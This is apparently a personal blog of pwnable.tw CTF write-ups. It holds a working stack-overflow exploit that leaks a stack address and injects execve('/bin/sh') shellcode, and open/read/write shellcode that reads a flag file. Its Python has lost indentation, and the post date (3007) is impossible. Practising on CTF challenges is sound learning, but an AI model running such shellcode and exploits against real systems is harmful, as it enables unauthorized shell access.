pwnable 做题记录

Posted by Elli0t on 3007-01-09

start

Just a start.

ROP类型的题 writeup 这道题注意的一个点就是 ret 的时候 esp 向下移动了一下,别忘了

劫持程序流的时候ret指令相当于pop eip。然后执行完ret后的esp指向的就是下一个栈地址了 下一个栈地址中保存着栈地址信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -*- coding:utf-8 -*-
from pwn import *
import time

context(os = 'linux', arch = 'i386', log_level = 'debug')

DEBUG = 0
LOCAL = True
BIN = './start'
HOST = 'chall.pwnable.tw'
PORT = 10000

def exploit(io):
io.recvuntil('F:')
payload_1 = 'a'*0x14 + p32(0x08048087)
io.send(payload_1)
leak_stack = u32(io.recv(4))
log.success(' stack_addr ==> ' + str(hex(leak_stack)))
# shellcode = asm(shellcraft.i386.linux.sh())
# execve("/bin/sh")
shellcode= '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload_2 = 'a'*0x14 + p32(leak_stack + 24) + p32(0) + shellcode
io.send(payload_2)
io.interactive()
return

if __name__ == '__main__':
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
io = remote(HOST,PORT)
exploit(io)
else:
LOCAL = True
io = process(BIN)
# io = process([BIN], env = {"LD_PRELOAD": "./libc-2.23.so"})
log.info('PID: ' + str(proc.pidof(io)[0]))
# pause
if DEBUG:
gdb.attach(io)
exploit(io)

ORW

Read the flag from /home/orw/flag.

Only open read write syscall are allowed to use.

0x20206761 需要该为 0x00006761(两个空格改为 \x00\x00),否则无法得到 flag。如下为使用 python 自带的和 pwntools 的模块进行 Hex -> Str 和 Str -> Hex。⚠️注意:unpack_many(“/home/orw/flag “) 中的字符串个数必须为4的倍数。

1
2
3
4
5
6
7
8
9
10
11
root@pwn:/ctf/work# python
Python 2.7.18rc1 (default, Apr 7 2020, 12:05:55)
[GCC 9.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> "00006761".decode('hex')
'\x00\x00ga'
>>> "6c662f77".decode('hex')
'lf/w'
>>> map(hex,unpack_many("/home/orw/flag "))
['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
from pwn import *
import time

context(log_level = 'debug', terminal = ["tmux", "sp", "-h"], arch = 'i386', os = 'linux')
# arch = 'i386' Don't forget !!!

DEBUG = 0
LOCAL = True
BIN = './orw'
HOST = 'chall.pwnable.tw'
PORT = 10001

# shallcode = ''

# fd = open('/home/orw/flag')
# read(fd,esp,0x30)
# write(1,esp,0x30)
#
# >>> map(hex,unpack_many("/home/orw/flag "))
# ['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']

shellcode = '''
xor eax, eax;
xor ebx, ebx;
xor ecx, ecx;
xor edx, edx;

push 0x00006761;
push 0x6c662f77;
push 0x726f2f65;
push 0x6d6f682f;

mov eax, 5; # open syscall number
mov ebx, esp; # filename
int 0x80; # eax = fd

mov ebx, eax; # fd = flag
mov ecx, esp; # buff = esp
mov edx, 0x30; # size = 0x30
mov eax, 3; # read syscall number
int 0x80;

mov ebx, 1; # fd = stdout
mov ecx, esp; # buff = esp
mov edx, 0x30; # size = 0x30
mov eax, 4; # write syscall number
int 0x80;

'''

def exploit(sh):
sh.recvuntil('Give my your shellcode:')
sh.sendline(asm(shellcode))
sh.interactive()
return

if __name__ == '__main__':
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
sh = remote(HOST,PORT)
exploit(sh)
else:
LOCAL = True
sh = process(BIN)
log.info('PID: ' + str(proc.pidof(sh)[0]))
# pause
if DEBUG:
gdb.attach(sh)
exploit(sh)

CVE-2018-1160

There is an old version Netatalk with some vulnerabilities, such as CVE-2018-1160.

Can you develop a 1-day exploit for this challenge? :p

好家伙,这个运行我都成问题(环境没有配置好)。留着后面研究

calc

Have you ever use Microsoft calculator?

https://blog.csdn.net/qq_43189757/article/details/102680061

https://yongy0ng2.tistory.com/29

https://v1ckydxp.github.io/2019/04/25/pwnable-tw-calc-writeup/

https://www.freebuf.com/articles/others-articles/132283.html